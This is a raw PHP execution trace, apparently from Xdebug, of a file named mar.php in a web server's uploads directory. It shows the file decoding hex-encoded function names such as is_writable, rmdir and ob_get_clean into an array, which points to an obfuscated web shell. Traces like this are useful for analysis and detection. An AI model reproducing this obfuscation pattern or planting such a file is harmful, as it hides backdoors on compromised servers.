2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	504	0	0.024320	522232	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	504	1	0.024337	522280
3	504	R			97
3	505	0	0.024355	522200	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	505	1	0.024371	522240
3	505	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	506	0	0.024415	522232	hexdec	0		/var/www/html/uploads/mar.php	540	1	'79'
3	506	1	0.024433	522280
3	506	R			121
3	507	0	0.024450	522200	chr	0		/var/www/html/uploads/mar.php	540	1	121
3	507	1	0.024466	522240
3	507	R			'y'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'y'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	491	1	0.024511	522208
2	491	R			'is_array'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'is_array'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	508	0	0.024559	522208	uhex	1		/var/www/html/uploads/mar.php	44	1	'69735f6f626a656374'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	509	0	0.024605	522240	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	509	1	0.024623	522288
3	509	R			105
3	510	0	0.024641	522208	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	510	1	0.024658	522248
3	510	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	511	0	0.024704	522272	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	511	1	0.024720	522320
3	511	R			115
3	512	0	0.024738	522240	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	512	1	0.024754	522280
3	512	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	513	0	0.024799	522272	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	513	1	0.024817	522320
3	513	R			95
3	514	0	0.024834	522240	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	514	1	0.024851	522280
3	514	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	515	0	0.024895	522272	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6f'
3	515	1	0.024912	522320
3	515	R			111
3	516	0	0.024930	522240	chr	0		/var/www/html/uploads/mar.php	540	1	111
3	516	1	0.024946	522280
3	516	R			'o'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'o'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	517	0	0.024991	522272	hexdec	0		/var/www/html/uploads/mar.php	540	1	'62'
3	517	1	0.025015	522320
3	517	R			98
3	518	0	0.025033	522240	chr	0		/var/www/html/uploads/mar.php	540	1	98
3	518	1	0.025050	522280
3	518	R			'b'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'b'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	519	0	0.025095	522272	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6a'
3	519	1	0.025112	522320
3	519	R			106
3	520	0	0.025130	522240	chr	0		/var/www/html/uploads/mar.php	540	1	106
3	520	1	0.025147	522280
3	520	R			'j'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'j'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	521	0	0.025195	522272	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	521	1	0.025214	522320
3	521	R			101
3	522	0	0.025232	522240	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	522	1	0.025248	522280
3	522	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	523	0	0.025291	522272	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	523	1	0.025309	522320
3	523	R			99
3	524	0	0.025327	522240	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	524	1	0.025342	522280
3	524	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	525	0	0.025387	522280	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	525	1	0.025405	522328
3	525	R			116
3	526	0	0.025424	522248	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	526	1	0.025439	522288
3	526	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	508	1	0.025485	522248
2	508	R			'is_object'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'is_object'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	527	0	0.025534	522248	uhex	1		/var/www/html/uploads/mar.php	44	1	'737472706f73'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	528	0	0.025579	522280	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	528	1	0.025597	522328
3	528	R			115
3	529	0	0.025614	522248	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	529	1	0.025630	522288
3	529	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	530	0	0.025672	522312	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	530	1	0.025689	522360
3	530	R			116
3	531	0	0.025707	522280	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	531	1	0.025719	522320
3	531	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	532	0	0.025760	522312	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	532	1	0.025772	522360
3	532	R			114
3	533	0	0.025785	522280	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	533	1	0.025796	522320
3	533	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	534	0	0.025827	522312	hexdec	0		/var/www/html/uploads/mar.php	540	1	'70'
3	534	1	0.025839	522360
3	534	R			112
3	535	0	0.025851	522280	chr	0		/var/www/html/uploads/mar.php	540	1	112
3	535	1	0.025862	522320
3	535	R			'p'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'p'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	536	0	0.025893	522312	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6f'
3	536	1	0.025905	522360
3	536	R			111
3	537	0	0.025917	522280	chr	0		/var/www/html/uploads/mar.php	540	1	111
3	537	1	0.025929	522320
3	537	R			'o'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'o'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	538	0	0.025959	522312	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	538	1	0.025971	522360
3	538	R			115
3	539	0	0.025983	522280	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	539	1	0.025999	522320
3	539	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	527	1	0.026030	522280
2	527	R			'strpos'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'strpos'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	540	0	0.026064	522280	uhex	1		/var/www/html/uploads/mar.php	44	1	'69735f7772697461626c65'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	541	0	0.026096	522312	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	541	1	0.026108	522360
3	541	R			105
3	542	0	0.026121	522280	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	542	1	0.026132	522320
3	542	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	543	0	0.026163	522344	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	543	1	0.026175	522392
3	543	R			115
3	544	0	0.026188	522312	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	544	1	0.026199	522352
3	544	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	545	0	0.026229	522344	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	545	1	0.026241	522392
3	545	R			95
3	546	0	0.026253	522312	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	546	1	0.026265	522352
3	546	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	547	0	0.026308	522344	hexdec	0		/var/www/html/uploads/mar.php	540	1	'77'
3	547	1	0.026326	522392
3	547	R			119
3	548	0	0.026344	522312	chr	0		/var/www/html/uploads/mar.php	540	1	119
3	548	1	0.026358	522352
3	548	R			'w'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'w'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	549	0	0.026390	522344	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	549	1	0.026402	522392
3	549	R			114
3	550	0	0.026415	522312	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	550	1	0.026426	522352
3	550	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	551	0	0.026456	522344	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	551	1	0.026468	522392
3	551	R			105
3	552	0	0.026483	522312	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	552	1	0.026495	522352
3	552	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	553	0	0.026570	522344	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	553	1	0.026582	522392
3	553	R			116
3	554	0	0.026595	522312	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	554	1	0.026606	522352
3	554	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	555	0	0.026636	522344	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	555	1	0.026647	522392
3	555	R			97
3	556	0	0.026660	522312	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	556	1	0.026671	522352
3	556	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	557	0	0.026700	522352	hexdec	0		/var/www/html/uploads/mar.php	540	1	'62'
3	557	1	0.026712	522400
3	557	R			98
3	558	0	0.026724	522320	chr	0		/var/www/html/uploads/mar.php	540	1	98
3	558	1	0.026735	522360
3	558	R			'b'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'b'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	559	0	0.026765	522352	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	559	1	0.026777	522400
3	559	R			108
3	560	0	0.026789	522320	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	560	1	0.026800	522360
3	560	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	561	0	0.026836	522352	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	561	1	0.026848	522400
3	561	R			101
3	562	0	0.026860	522320	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	562	1	0.026871	522360
3	562	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	540	1	0.026901	522320
2	540	R			'is_writable'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'is_writable'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	563	0	0.026935	522320	uhex	1		/var/www/html/uploads/mar.php	44	1	'69735f7265616461626c65'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	564	0	0.026967	522352	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	564	1	0.026979	522400
3	564	R			105
3	565	0	0.026991	522320	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	565	1	0.027002	522360
3	565	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	566	0	0.027032	522384	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	566	1	0.027044	522432
3	566	R			115
3	567	0	0.027056	522352	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	567	1	0.027067	522392
3	567	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	568	0	0.027097	522384	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	568	1	0.027109	522432
3	568	R			95
3	569	0	0.027122	522352	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	569	1	0.027133	522392
3	569	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	570	0	0.027163	522384	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	570	1	0.027175	522432
3	570	R			114
3	571	0	0.027187	522352	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	571	1	0.027198	522392
3	571	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	572	0	0.027228	522384	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	572	1	0.027240	522432
3	572	R			101
3	573	0	0.027252	522352	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	573	1	0.027263	522392
3	573	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	574	0	0.027293	522384	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	574	1	0.027305	522432
3	574	R			97
3	575	0	0.027317	522352	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	575	1	0.027328	522392
3	575	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	576	0	0.027358	522384	hexdec	0		/var/www/html/uploads/mar.php	540	1	'64'
3	576	1	0.027370	522432
3	576	R			100
3	577	0	0.027382	522352	chr	0		/var/www/html/uploads/mar.php	540	1	100
3	577	1	0.027393	522392
3	577	R			'd'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'd'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	578	0	0.027422	522384	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	578	1	0.027434	522432
3	578	R			97
3	579	0	0.027446	522352	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	579	1	0.027457	522392
3	579	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	580	0	0.027486	522392	hexdec	0		/var/www/html/uploads/mar.php	540	1	'62'
3	580	1	0.027498	522440
3	580	R			98
3	581	0	0.027510	522360	chr	0		/var/www/html/uploads/mar.php	540	1	98
3	581	1	0.027522	522400
3	581	R			'b'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'b'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	582	0	0.027552	522392	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	582	1	0.027567	522440
3	582	R			108
3	583	0	0.027579	522360	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	583	1	0.027591	522400
3	583	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	584	0	0.027621	522392	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	584	1	0.027633	522440
3	584	R			101
3	585	0	0.027645	522360	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	585	1	0.027656	522400
3	585	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	563	1	0.027685	522360
2	563	R			'is_readable'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'is_readable'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	586	0	0.027720	523640	uhex	1		/var/www/html/uploads/mar.php	44	1	'737472746f74696d65'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	587	0	0.027751	523672	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	587	1	0.027763	523720
3	587	R			115
3	588	0	0.027775	523640	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	588	1	0.027787	523680
3	588	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	589	0	0.027817	523704	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	589	1	0.027828	523752
3	589	R			116
3	590	0	0.027841	523672	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	590	1	0.027852	523712
3	590	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	591	0	0.027882	523704	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	591	1	0.027894	523752
3	591	R			114
3	592	0	0.027906	523672	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	592	1	0.027917	523712
3	592	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	593	0	0.027947	523704	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	593	1	0.027958	523752
3	593	R			116
3	594	0	0.027970	523672	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	594	1	0.027981	523712
3	594	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	595	0	0.028011	523704	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6f'
3	595	1	0.028023	523752
3	595	R			111
3	596	0	0.028035	523672	chr	0		/var/www/html/uploads/mar.php	540	1	111
3	596	1	0.028046	523712
3	596	R			'o'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'o'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	597	0	0.028076	523704	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	597	1	0.028087	523752
3	597	R			116
3	598	0	0.028099	523672	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	598	1	0.028110	523712
3	598	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	599	0	0.028139	523704	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	599	1	0.028151	523752
3	599	R			105
3	600	0	0.028163	523672	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	600	1	0.028174	523712
3	600	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	601	0	0.028204	523704	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6d'
3	601	1	0.028217	523752
3	601	R			109
3	602	0	0.028229	523672	chr	0		/var/www/html/uploads/mar.php	540	1	109
3	602	1	0.028240	523712
3	602	R			'm'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'm'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	603	0	0.028270	523712	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	603	1	0.028281	523760
3	603	R			101
3	604	0	0.028294	523680	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	604	1	0.028309	523720
3	604	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	586	1	0.028339	523680
2	586	R			'strtotime'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'strtotime'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	605	0	0.028372	523680	uhex	1		/var/www/html/uploads/mar.php	44	1	'66696c6573697a65'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	606	0	0.028404	523712	hexdec	0		/var/www/html/uploads/mar.php	540	1	'66'
3	606	1	0.028415	523760
3	606	R			102
3	607	0	0.028428	523680	chr	0		/var/www/html/uploads/mar.php	540	1	102
3	607	1	0.028439	523720
3	607	R			'f'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'f'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	608	0	0.028469	523744	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	608	1	0.028481	523792
3	608	R			105
3	609	0	0.028493	523712	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	609	1	0.028505	523752
3	609	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	610	0	0.028534	523744	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	610	1	0.028546	523792
3	610	R			108
3	611	0	0.028559	523712	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	611	1	0.028570	523752
3	611	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	612	0	0.028600	523744	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	612	1	0.028612	523792
3	612	R			101
3	613	0	0.028625	523712	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	613	1	0.028636	523752
3	613	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	614	0	0.028665	523744	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	614	1	0.028677	523792
3	614	R			115
3	615	0	0.028689	523712	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	615	1	0.028700	523752
3	615	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	616	0	0.028730	523744	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	616	1	0.028742	523792
3	616	R			105
3	617	0	0.028754	523712	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	617	1	0.028765	523752
3	617	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	618	0	0.028795	523744	hexdec	0		/var/www/html/uploads/mar.php	540	1	'7a'
3	618	1	0.028806	523792
3	618	R			122
3	619	0	0.028818	523712	chr	0		/var/www/html/uploads/mar.php	540	1	122
3	619	1	0.028829	523752
3	619	R			'z'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'z'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	620	0	0.028859	523744	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	620	1	0.028871	523792
3	620	R			101
3	621	0	0.028883	523712	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	621	1	0.028894	523752
3	621	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	605	1	0.028924	523720
2	605	R			'filesize'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'filesize'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	622	0	0.028958	523720	uhex	1		/var/www/html/uploads/mar.php	44	1	'726d646972'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	623	0	0.028988	523752	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	623	1	0.029000	523800
3	623	R			114
3	624	0	0.029013	523720	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	624	1	0.029024	523760
3	624	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	625	0	0.029057	523784	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6d'
3	625	1	0.029069	523832
3	625	R			109
3	626	0	0.029082	523752	chr	0		/var/www/html/uploads/mar.php	540	1	109
3	626	1	0.029093	523792
3	626	R			'm'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'm'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	627	0	0.029123	523784	hexdec	0		/var/www/html/uploads/mar.php	540	1	'64'
3	627	1	0.029134	523832
3	627	R			100
3	628	0	0.029147	523752	chr	0		/var/www/html/uploads/mar.php	540	1	100
3	628	1	0.029158	523792
3	628	R			'd'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'd'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	629	0	0.029188	523784	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	629	1	0.029199	523832
3	629	R			105
3	630	0	0.029212	523752	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	630	1	0.029223	523792
3	630	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	631	0	0.029253	523784	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	631	1	0.029265	523832
3	631	R			114
3	632	0	0.029277	523752	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	632	1	0.029288	523792
3	632	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	622	1	0.029318	523752
2	622	R			'rmdir'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'rmdir'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	633	0	0.029351	523752	uhex	1		/var/www/html/uploads/mar.php	44	1	'6f625f6765745f636c65616e'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	634	0	0.029382	523784	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6f'
3	634	1	0.029394	523832
3	634	R			111
3	635	0	0.029406	523752	chr	0		/var/www/html/uploads/mar.php	540	1	111
3	635	1	0.029417	523792
3	635	R			'o'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'o'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	636	0	0.029447	523816	hexdec	0		/var/www/html/uploads/mar.php	540	1	'62'
3	636	1	0.029459	523864
3	636	R			98
3	637	0	0.029471	523784	chr	0		/var/www/html/uploads/mar.php	540	1	98
3	637	1	0.029483	523824
3	637	R			'b'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'b'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	638	0	0.029513	523816	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	638	1	0.029525	523864
3	638	R			95
3	639	0	0.029537	523784	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	639	1	0.029548	523824
3	639	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	640	0	0.029578	523816	hexdec	0		/var/www/html/uploads/mar.php	540	1	'67'
3	640	1	0.029589	523864
3	640	R			103
3	641	0	0.029602	523784	chr	0		/var/www/html/uploads/mar.php	540	1	103
3	641	1	0.029612	523824
3	641	R			'g'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'g'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	642	0	0.029642	523816	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	642	1	0.029654	523864
3	642	R			101
3	643	0	0.029666	523784	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	643	1	0.029677	523824
3	643	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	644	0	0.029707	523816	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	644	1	0.029718	523864
3	644	R			116
3	645	0	0.029731	523784	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	645	1	0.029748	523824
3	645	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	646	0	0.029788	523816	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	646	1	0.029800	523864
3	646	R			95
3	647	0	0.029812	523784	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	647	1	0.029823	523824
3	647	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	648	0	0.029853	523816	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	648	1	0.029865	523864
3	648	R			99
3	649	0	0.029877	523784	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	649	1	0.029888	523824
3	649	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	650	0	0.029918	523824	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	650	1	0.029930	523872
3	650	R			108
3	651	0	0.029942	523792	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	651	1	0.029953	523832
3	651	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
